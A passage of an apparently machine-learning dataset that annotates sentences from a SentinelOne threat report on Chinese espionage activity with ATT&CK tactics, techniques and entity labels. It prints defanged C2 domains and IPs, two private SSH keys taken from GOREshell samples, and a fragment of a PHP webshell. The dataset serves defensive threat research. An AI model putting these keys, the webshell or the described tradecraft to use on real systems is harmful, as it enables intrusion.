"GOREshell ", "start": 5, "end": 15, "label": "MalwareTool" }, { "text": "tapisrv.dll", "start": 43, "end": 54, "label": "MalwareTool" }, { "text": "svchost.exe", "start": 144, "end": 155, "label": "Infrastructure_Indicator" }, { "text": "implemented ", "start": 26, "end": 38, "label": "Action" }, { "text": "loaded ", "start": 109, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s106-fb0ebe", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "This GOREshell variant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a Windows service by the svchost.exe service container process.", "sentence_text": "The malware uses the mail.ccna[.]organiccrap[.]com domain for C2 purposes.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Use a domain for command-and-control communication.", "entities": [ { "text": "uses", "start": 12, "end": 16, "label": "Action" }, { "text": "mail.ccna[.]organiccrap[.]com", "start": 21, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s107-c6d5b8", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "The malware uses the mail.ccna[.]organiccrap[.]com domain for C2 purposes.", "sentence_text": "The discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a considerable period.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s108-c750ca", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "The discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a considerable period.", "sentence_text": "We associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated from China and actively used by several suspected Chinese cyberespionage actors, including overlaps with APT15.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.002", "name": "DNS Server" } ], "procedure": "Uses an ORB network for C2 infrastructure, shared with other actors", "entities": [ { "text": "Chinese cyberespionage actors", "start": 157, "end": 186, "label": "ThreatActor" }, { "text": "APT15", "start": 212, "end": 217, "label": "ThreatActor" }, { "text": "GOREshell C2 infrastructure", "start": 25, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "ORB network", "start": 61, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "operated ", "start": 98, "end": 107, "label": "Action" }, { "text": "used ", "start": 131, "end": 136, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s109-6c5209", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "We associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated from China and actively used by several suspected Chinese cyberespionage actors, including overlaps with APT15.", "sentence_text": "Our analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of a tool called clear13 , developed by members of The Hacker’s Choice community.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Compiled and modified the clear13 tool source code", "entities": [ { "text": "mcl ", "start": 16, "end": 20, "label": "MalwareTool" }, { "text": "clear13 ", "start": 127, "end": 135, "label": "MalwareTool" }, { "text": "The Hacker’s Choice community", "start": 161, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "compiled and modified", "start": 61, "end": 82, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s110-87ae5d", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 110, "context_before": "Our analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of a tool called clear13 , developed by members of The Hacker’s Choice community.", "sentence_text": "The source code of clear13 is publicly available on GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s111-260124", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 111, "context_before": "The source code of clear13 is publicly available on GitHub.", "sentence_text": "The\nmcl\nexecutable is packed using a custom-modified version of UPX.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s112-8b7ab1", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 112, "context_before": "The\nmcl\nexecutable is packed using a custom-modified version of UPX.", "sentence_text": "The tool supports four commands, which are presented to the user through a help menu.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s113-39a822", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 113, "context_before": "The tool supports four commands, which are presented to the user through a help menu.", "sentence_text": "Activity E | Probing & Reconnaissance of SentinelOne Infrastructure In October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595.002", "name": "Vulnerability Scanning" } ], "procedure": "Attempted to establish remote connections to SentinelOne servers over port 443", "entities": [ { "text": " Probing & Reconnaissance", "start": 12, "end": 37, "label": "Action" }, { "text": "establish remote connections ", "start": 130, "end": 159, "label": "Action" }, { "text": "SentinelOne servers", "start": 187, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "port 443", "start": 212, "end": 220, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s114-ed236e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 114, "context_before": "Activity E | Probing & Reconnaissance of SentinelOne Infrastructure In October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.", "sentence_text": "Our analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the South Asian government entity (Activity D).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Used infrastructure linked to a prior government entity intrusion", "entities": [ { "text": "revealed ", "start": 65, "end": 74, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s115-8659a7", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 115, "context_before": "Our analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the South Asian government entity (Activity D).", "sentence_text": "The connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a proxy.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Used a VPS that proxied connections through a C2 server", "entities": [ { "text": "virtual private server (VPS)", "start": 56, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "C2 server", "start": 97, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "originated ", "start": 38, "end": 49, "label": "Action" }, { "text": "used a C2 server as a proxy", "start": 90, "end": 117, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s116-43220b", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 116, "context_before": "The connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a proxy.", "sentence_text": "At the time of the activity, the server had an IP address of 128.199.124[.]136 , which was mapped to the domain name tatacom.duckdns[.]org and is designed to appear as part of a major South Asian telecommunications provider’s infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584.005", "name": "Botnet" } ], "procedure": "Used infrastructure designed to impersonate a telecommunications provider", "entities": [ { "text": "128.199.124[.]136", "start": 61, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "tatacom.duckdns[.]org", "start": 117, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "South Asian telecommunications provider’s infrastructure", "start": 184, "end": 240, "label": "Infrastructure_Indicator" }, { "text": "appear ", "start": 158, "end": 165, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s117-5a1c25", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 117, "context_before": "At the time of the activity, the server had an IP address of 128.199.124[.]136 , which was mapped to the domain name tatacom.duckdns[.]org and is designed to appear as part of a major South Asian telecommunications provider’s infrastructure.", "sentence_text": "Based on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Used infrastructure with a unique server fingerprint", "entities": [ { "text": " unique server fingerprint", "start": 10, "end": 36, "label": "Infrastructure_Indicator" }, { "text": " network infrastructure", "start": 96, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s118-65dc19", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 118, "context_before": "Based on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network infrastructure.", "sentence_text": "The C2 domain downloads.trendav[.]vip , observed in Activity D, resolved to the IP address 142.93.214[.]219 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s119-933863", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 119, "context_before": "The C2 domain downloads.trendav[.]vip , observed in Activity D, resolved to the IP address 142.93.214[.]219 .", "sentence_text": "We also identified this IP address based on the server fingerprint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s120-a5b15e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 120, "context_before": "We also identified this IP address based on the server fingerprint.", "sentence_text": "Furthermore, the IP address of a server associated with the same fingerprint, 143.244.137[.]54 , was mapped to the domain name cloud.trendav[.]co in October 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s121-372bfc", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 121, "context_before": "Furthermore, the IP address of a server associated with the same fingerprint, 143.244.137[.]54 , was mapped to the domain name cloud.trendav[.]co in October 2024.", "sentence_text": "This domain name overlaps with downloads.trendav[.]vip Additionally, historical domain registration records show that the root domain trendav[.]vip was originally registered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Registered the trendav[.]vip domain", "entities": [ { "text": "downloads.trendav[.]vip", "start": 31, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "trendav[.]vip", "start": 134, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "Dynadot Inc", "start": 182, "end": 193, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s122-50bda1", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 122, "context_before": "This domain name overlaps with downloads.trendav[.]vip Additionally, historical domain registration records show that the root domain trendav[.]vip was originally registered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC.", "sentence_text": "Identifying all domains registered through the same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and sentinelxdr[.]us , the latter of which likely masquerades as SentinelOne infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Registered domains secmailbox[.]us and sentinelxdr[.]us to masquerade as legitimate infrastructure", "entities": [ { "text": "SentinelOne infrastructure", "start": 211, "end": 237, "label": "Infrastructure_Indicator" }, { "text": "secmailbox[.]us", "start": 130, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "sentinelxdr[.]us", "start": 150, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "masquerades ", "start": 196, "end": 208, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s123-a6a755", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 123, "context_before": "Identifying all domains registered through the same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and sentinelxdr[.]us , the latter of which likely masquerades as SentinelOne infrastructure.", "sentence_text": "Between February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219 , the same IP address that downloads.trendav[.]vip resolved to in October 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Resolved sentinelxdr[.]us to the same IP as a known C2 domain", "entities": [ { "text": "sentinelxdr[.]us", "start": 37, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "142.93.214[.]219", "start": 73, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "downloads.trendav[.]vip", "start": 117, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s124-edf259", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 124, "context_before": "Between February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219 , the same IP address that downloads.trendav[.]vip resolved to in October 2024.", "sentence_text": "In October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s125-bdec32", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 125, "context_before": "In October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42 .", "sentence_text": "Like the server at IP address 142.93.214[.]219 ( downloads.trendav[.]vip/sentinelxdr[.]us ), this server shared the same server fingerprint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s126-cd872c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 126, "context_before": "Like the server at IP address 142.93.214[.]219 ( downloads.trendav[.]vip/sentinelxdr[.]us ), this server shared the same server fingerprint.", "sentence_text": "These overlaps include the use of the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Used the GOREshell backdoor and tools from The Hacker's Choice", "entities": [ { "text": "GOREshell backdoor", "start": 38, "end": 56, "label": "MalwareTool" }, { "text": "publicly available tools developed by The Hacker’s Choice community", "start": 61, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "use ", "start": 27, "end": 31, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s127-29c1cf", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 127, "context_before": "These overlaps include the use of the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.", "sentence_text": "The threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26 over the WebSocket protocol for C2 communication ( wss[://]107.173.111[.]26:443 ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Deployed a GOREshell sample using WebSocket protocol to 107.173.111[.]26 for C2", "entities": [ { "text": "UPX-packed GOREshell sample", "start": 28, "end": 55, "label": "MalwareTool" }, { "text": "107.173.111[.]26", "start": 85, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "wss[://]107.173.111[.]26:443", "start": 153, "end": 181, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 17, "end": 26, "label": "Action" }, { "text": "configured to use", "start": 67, "end": 84, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s128-b376ee", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 128, "context_before": "The threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26 over the WebSocket protocol for C2 communication ( wss[://]107.173.111[.]26:443 ).", "sentence_text": "The executable file we retrieved contains a private SSH key and the public SSH key fingerprint f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590 -----BEGIN", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Embedded a private SSH key and specific public key fingerprint in the malware", "entities": [ { "text": "executable file", "start": 4, "end": 19, "label": "MalwareTool" }, { "text": "private SSH key", "start": 44, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "public SSH key fingerprint f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590", "start": 68, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s129-3da7b2", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 129, "context_before": "The executable file we retrieved contains a private SSH key and the public SSH key fingerprint f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590 -----BEGIN", "sentence_text": "PRIVATE KEY----- MC4CAQAwBQYDK2VwBCIEIMsHXDEWgXiPFrIjDOSXZqReC2HHiS6kgoZT0YgHlK87 -----END PRIVATE KEY----- Based on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware sharing platform from Iran in late July 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s130-3bd6c0", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 130, "context_before": "PRIVATE KEY----- MC4CAQAwBQYDK2VwBCIEIMsHXDEWgXiPFrIjDOSXZqReC2HHiS6kgoZT0YgHlK87 -----END PRIVATE KEY----- Based on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware sharing platform from Iran in late July 2024.", "sentence_text": "This GOREshell sample also contains a private SSH key and is configured to use the same C2 server, 107.173.111[.]26 , over the TLS protocol ( tls[://]107.173.111[.]26:80 ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Configure malware to use a C2 server over TLS.", "entities": [ { "text": "configured to use", "start": 61, "end": 78, "label": "Action" }, { "text": "107.173.111[.]26", "start": 99, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "TLS protocol", "start": 127, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s131-a47d4c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 131, "context_before": "This GOREshell sample also contains a private SSH key and is configured to use the same C2 server, 107.173.111[.]26 , over the TLS protocol ( tls[://]107.173.111[.]26:80 ).", "sentence_text": "This suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the Middle East.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s132-88f7c5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 132, "context_before": "This suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the Middle East.", "sentence_text": "-----BEGIN PRIVATE KEY----- MC4CAQAwBQYDK2VwBCIEINArpOAwJO2+lv9Da+PzmkbKxGhMcapQ+/NhUq4nifvh -----END PRIVATE KEY-----", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s133-c27b98", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 133, "context_before": "-----BEGIN PRIVATE KEY----- MC4CAQAwBQYDK2VwBCIEINArpOAwJO2+lv9Da+PzmkbKxGhMcapQ+/NhUq4nifvh -----END PRIVATE KEY-----", "sentence_text": "The threat actor also deployed version 2.5a1 of dsniff , a collection of tools for network auditing and penetration testing.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Deployed dsniff v2.5a1 for network auditing/penetration testing", "entities": [ { "text": "dsniff ", "start": 48, "end": 55, "label": "MalwareTool" }, { "text": "deployed ", "start": 22, "end": 31, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s134-541c27", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 134, "context_before": "The threat actor also deployed version 2.5a1 of dsniff , a collection of tools for network auditing and penetration testing.", "sentence_text": "With active development of dsniff having been discontinued for over 15 years, our investigation of public source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume active maintenance of the project.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Utilized a version of dsniff recently revived by the THC community", "entities": [ { "text": "THC community", "start": 149, "end": 162, "label": "Infrastructure_Indicator" }, { "text": "public source code repositories", "start": 99, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "released ", "start": 167, "end": 176, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s135-8fc470", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 135, "context_before": "With active development of dsniff having been discontinued for over 15 years, our investigation of public source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume active maintenance of the project.", "sentence_text": "To obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to September 15, 2021.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Timestomped deployed executables to September 15, 2021", "entities": [ { "text": "timestomped ", "start": 46, "end": 58, "label": "Action" }, { "text": "deployed ", "start": 58, "end": 67, "label": "Action" }, { "text": "setting their creation date", "start": 80, "end": 107, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s136-135344", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 136, "context_before": "To obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to September 15, 2021.", "sentence_text": "After gaining initial access to the environment, the perpetrators deployed a simple PHP webshell that enables remote command execution by passing commands via the parameter and executing them with elevated privileges using sudo ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s138-fcec72", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 138, "context_before": "@$_REQUEST['a']);?>", "sentence_text": "Our investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial foothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services Appliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s139-855e9b", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 139, "context_before": "Our investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial foothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services Appliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.", "sentence_text": "We track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is operated from China and includes compromised network edge devices.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584.005", "name": "Botnet" } ], "procedure": "Used an ORB network of compromised edge devices for infrastructure", "entities": [ { "text": "ORB network", "start": 80, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "compromised network edge devices", "start": 146, "end": 178, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s140-ec3c7f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 140, "context_before": "We track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is operated from China and includes compromised network edge devices.", "sentence_text": "Conclusions\nThis post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s141-089709", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 141, "context_before": "Conclusions\nThis post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves.", "sentence_text": "The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s142-322628", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 142, "context_before": "The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure.", "sentence_text": "We encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense coordination, recognizing that collective security strengthens the entire community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s143-de54c2", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 143, "context_before": "We encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense coordination, recognizing that collective security strengthens the entire community.", "sentence_text": "We are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s144-e0fc6f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 144, "context_before": "We are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.", "sentence_text": "Indicators of Compromise SHA-1 Hashes Domains IP Addresses URLs adversary China Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s145-d9b530", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 145, "context_before": "Indicators of Compromise SHA-1 Hashes Domains IP Addresses URLs adversary China Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "sentence_text": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s146-f87347", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 146, "context_before": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "sentence_text": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s147-2c0b2a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 147, "context_before": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "sentence_text": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s148-f3a40f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 148, "context_before": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "sentence_text": "Tom Hegel\nAn accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s149-b8feb6", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 149, "context_before": "Tom Hegel\nAn accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "sentence_text": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s150-6c55cf", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 150, "context_before": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "sentence_text": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s151-af3310", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 151, "context_before": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "sentence_text": "Prev\nFreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s152-bb60c9", "source": "sentinel", "doc_id": 